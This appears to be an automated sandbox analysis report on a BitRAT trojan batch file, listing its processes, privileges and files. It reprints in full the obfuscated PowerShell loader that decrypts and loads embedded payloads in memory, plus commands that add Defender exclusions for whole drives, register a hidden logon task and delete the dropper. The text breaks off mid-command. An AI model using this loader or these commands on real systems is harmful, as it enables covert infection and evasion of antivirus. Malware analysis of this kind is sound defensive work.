Malware Analysis Report

2025-01-03 05:26

Sample ID 231012-bmt1wsfb3z
Target Stub_SC.bat
SHA256 c222b81571013219fd99f7ca5fefa350d6aabd28b03bbc819048a67570db274e
Tags
bitrat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c222b81571013219fd99f7ca5fefa350d6aabd28b03bbc819048a67570db274e

Threat Level: Known bad

The file Stub_SC.bat was found to be: Known bad.

Malicious Activity Summary

bitrat trojan

BitRAT

Checks computer location settings

Executes dropped EXE

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-12 01:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-12 01:16

Reported

2023-10-13 00:38

Platform

win7-20230831-en

Max time kernel

151s

Max time network

133s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe N/A

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat

C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe

"C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe" -w hidden -c $apqR='LMJyQoaMJyQdMJyQ'.Replace('MJyQ', ''),'DecEzhXomEzhXprEzhXeEzhXsEzhXsEzhX'.Replace('EzhX', ''),'FHipDrHipDoHipDmHipDBasHipDe6HipD4SHipDtrHipDingHipD'.Replace('HipD', ''),'ReaGlTbdLiGlTbneGlTbsGlTb'.Replace('GlTb', ''),'CoHbpApHbpAyTHbpAoHbpA'.Replace('HbpA', ''),'MaEheginEhegMoEhegduEheglEhegeEheg'.Replace('Eheg', ''),'TroOznansoOznfooOznroOznmFoOzninaoOznloOznBloOznockoOzn'.Replace('oOzn', ''),'ChSshoanSshogeSshoESshoxSshotSshoeSshonsiSshooSshonSsho'.Replace('Ssho', ''),'EnnHrXtrynHrXPnHrXoinnHrXtnHrX'.Replace('nHrX', ''),'IndGVtvodGVtkedGVt'.Replace('dGVt', ''),'ElSdypemSdypeSdypntSdypAtSdyp'.Replace('Sdyp', ''),'SpuMPtliuMPttuMPt'.Replace('uMPt', ''),'GaSlAeaSlAtaSlACuaSlAraSlAreaSlAntaSlAPaSlAraSlAocaSlAesaSlAsaSlA'.Replace('aSlA', ''),'CrUNafeUNafatUNafeUNafDecUNafryUNafptUNafoUNafrUNaf'.Replace('UNaf', '');function pOCfZ($gekvJ){$BSBXA=[System.Security.Cryptography.Aes]::Create();$BSBXA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BSBXA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BSBXA.Key=[System.Convert]::($apqR[2])('zBdPf8AkDtINuDPE/A2HyG7nwgGIz2wO8zG9RRZ4V9A=');$BSBXA.IV=[System.Convert]::($apqR[2])('xa/+kPbivBu87Qs+xDhCVw==');$JTIYa=$BSBXA.($apqR[13])();$Yaopt=$JTIYa.($apqR[6])($gekvJ,0,$gekvJ.Length);$JTIYa.Dispose();$BSBXA.Dispose();$Yaopt;}function PqvPo($gekvJ){$Pbfvo=New-Object System.IO.MemoryStream(,$gekvJ);$ojhOO=New-Object System.IO.MemoryStream;$Oxkfy=New-Object System.IO.Compression.GZipStream($Pbfvo,[IO.Compression.CompressionMode]::($apqR[1]));$Oxkfy.($apqR[4])($ojhOO);$Oxkfy.Dispose();$Pbfvo.Dispose();$ojhOO.Dispose();$ojhOO.ToArray();}$atogv=[System.Linq.Enumerable]::($apqR[10])([System.IO.File]::($apqR[3])([System.IO.Path]::($apqR[7])([System.Diagnostics.Process]::($apqR[12])().($apqR[5]).FileName, $null)), 1);$MrHap=$atogv.Substring(2).($apqR[11])(':');$llRaa=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[0])));$VSAoW=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[1])));[System.Reflection.Assembly]::($apqR[0])([byte[]]$VSAoW).($apqR[8]).($apqR[9])($null,$null);[System.Reflection.Assembly]::($apqR[0])([byte[]]$llRaa).($apqR[8]).($apqR[9])($null,$null);

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

memory/3004-5-0x0000000073F30000-0x00000000744DB000-memory.dmp

memory/3004-6-0x0000000073F30000-0x00000000744DB000-memory.dmp

memory/3004-7-0x00000000024A0000-0x00000000024E0000-memory.dmp

memory/3004-8-0x0000000073F30000-0x00000000744DB000-memory.dmp

memory/3004-9-0x0000000073F30000-0x00000000744DB000-memory.dmp

memory/3004-10-0x00000000024A0000-0x00000000024E0000-memory.dmp

memory/3004-11-0x00000000024A0000-0x00000000024E0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-12 01:16

Reported

2023-10-13 00:37

Platform

win10v2004-20230915-en

Max time kernel

151s

Max time network

159s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat"

Signatures

BitRAT

trojan bitrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1104 wrote to memory of 1396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 1396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1396 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe
PID 1396 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe
PID 1396 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe
PID 3924 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3924 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\cmd.exe
PID 3924 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\cmd.exe
PID 3924 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe C:\Windows\SysWOW64\cmd.exe
PID 4664 wrote to memory of 2324 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe
PID 4664 wrote to memory of 2324 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe
PID 4664 wrote to memory of 2324 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe
PID 2324 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 32 N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 32 N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 32 N/A C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat

C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe

"C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe" -w hidden -c $apqR='LMJyQoaMJyQdMJyQ'.Replace('MJyQ', ''),'DecEzhXomEzhXprEzhXeEzhXsEzhXsEzhX'.Replace('EzhX', ''),'FHipDrHipDoHipDmHipDBasHipDe6HipD4SHipDtrHipDingHipD'.Replace('HipD', ''),'ReaGlTbdLiGlTbneGlTbsGlTb'.Replace('GlTb', ''),'CoHbpApHbpAyTHbpAoHbpA'.Replace('HbpA', ''),'MaEheginEhegMoEhegduEheglEhegeEheg'.Replace('Eheg', ''),'TroOznansoOznfooOznroOznmFoOzninaoOznloOznBloOznockoOzn'.Replace('oOzn', ''),'ChSshoanSshogeSshoESshoxSshotSshoeSshonsiSshooSshonSsho'.Replace('Ssho', ''),'EnnHrXtrynHrXPnHrXoinnHrXtnHrX'.Replace('nHrX', ''),'IndGVtvodGVtkedGVt'.Replace('dGVt', ''),'ElSdypemSdypeSdypntSdypAtSdyp'.Replace('Sdyp', ''),'SpuMPtliuMPttuMPt'.Replace('uMPt', ''),'GaSlAeaSlAtaSlACuaSlAraSlAreaSlAntaSlAPaSlAraSlAocaSlAesaSlAsaSlA'.Replace('aSlA', ''),'CrUNafeUNafatUNafeUNafDecUNafryUNafptUNafoUNafrUNaf'.Replace('UNaf', '');function pOCfZ($gekvJ){$BSBXA=[System.Security.Cryptography.Aes]::Create();$BSBXA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BSBXA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BSBXA.Key=[System.Convert]::($apqR[2])('zBdPf8AkDtINuDPE/A2HyG7nwgGIz2wO8zG9RRZ4V9A=');$BSBXA.IV=[System.Convert]::($apqR[2])('xa/+kPbivBu87Qs+xDhCVw==');$JTIYa=$BSBXA.($apqR[13])();$Yaopt=$JTIYa.($apqR[6])($gekvJ,0,$gekvJ.Length);$JTIYa.Dispose();$BSBXA.Dispose();$Yaopt;}function PqvPo($gekvJ){$Pbfvo=New-Object System.IO.MemoryStream(,$gekvJ);$ojhOO=New-Object System.IO.MemoryStream;$Oxkfy=New-Object System.IO.Compression.GZipStream($Pbfvo,[IO.Compression.CompressionMode]::($apqR[1]));$Oxkfy.($apqR[4])($ojhOO);$Oxkfy.Dispose();$Pbfvo.Dispose();$ojhOO.Dispose();$ojhOO.ToArray();}$atogv=[System.Linq.Enumerable]::($apqR[10])([System.IO.File]::($apqR[3])([System.IO.Path]::($apqR[7])([System.Diagnostics.Process]::($apqR[12])().($apqR[5]).FileName, $null)), 1);$MrHap=$atogv.Substring(2).($apqR[11])(':');$llRaa=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[0])));$VSAoW=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[1])));[System.Reflection.Assembly]::($apqR[0])([byte[]]$VSAoW).($apqR[8]).($apqR[9])($null,$null);[System.Reflection.Assembly]::($apqR[0])([byte[]]$llRaa).($apqR[8]).($apqR[9])($null,$null);

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3924);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\Stub_SC')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 42453' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network42453Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Network42453Man.cmd" "

C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe

"C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe" -w hidden -c $apqR='LMJyQoaMJyQdMJyQ'.Replace('MJyQ', ''),'DecEzhXomEzhXprEzhXeEzhXsEzhXsEzhX'.Replace('EzhX', ''),'FHipDrHipDoHipDmHipDBasHipDe6HipD4SHipDtrHipDingHipD'.Replace('HipD', ''),'ReaGlTbdLiGlTbneGlTbsGlTb'.Replace('GlTb', ''),'CoHbpApHbpAyTHbpAoHbpA'.Replace('HbpA', ''),'MaEheginEhegMoEhegduEheglEhegeEheg'.Replace('Eheg', ''),'TroOznansoOznfooOznroOznmFoOzninaoOznloOznBloOznockoOzn'.Replace('oOzn', ''),'ChSshoanSshogeSshoESshoxSshotSshoeSshonsiSshooSshonSsho'.Replace('Ssho', ''),'EnnHrXtrynHrXPnHrXoinnHrXtnHrX'.Replace('nHrX', ''),'IndGVtvodGVtkedGVt'.Replace('dGVt', ''),'ElSdypemSdypeSdypntSdypAtSdyp'.Replace('Sdyp', ''),'SpuMPtliuMPttuMPt'.Replace('uMPt', ''),'GaSlAeaSlAtaSlACuaSlAraSlAreaSlAntaSlAPaSlAraSlAocaSlAesaSlAsaSlA'.Replace('aSlA', ''),'CrUNafeUNafatUNafeUNafDecUNafryUNafptUNafoUNafrUNaf'.Replace('UNaf', '');function pOCfZ($gekvJ){$BSBXA=[System.Security.Cryptography.Aes]::Create();$BSBXA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BSBXA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BSBXA.Key=[System.Convert]::($apqR[2])('zBdPf8AkDtINuDPE/A2HyG7nwgGIz2wO8zG9RRZ4V9A=');$BSBXA.IV=[System.Convert]::($apqR[2])('xa/+kPbivBu87Qs+xDhCVw==');$JTIYa=$BSBXA.($apqR[13])();$Yaopt=$JTIYa.($apqR[6])($gekvJ,0,$gekvJ.Length);$JTIYa.Dispose();$BSBXA.Dispose();$Yaopt;}function PqvPo($gekvJ){$Pbfvo=New-Object System.IO.MemoryStream(,$gekvJ);$ojhOO=New-Object System.IO.MemoryStream;$Oxkfy=New-Object 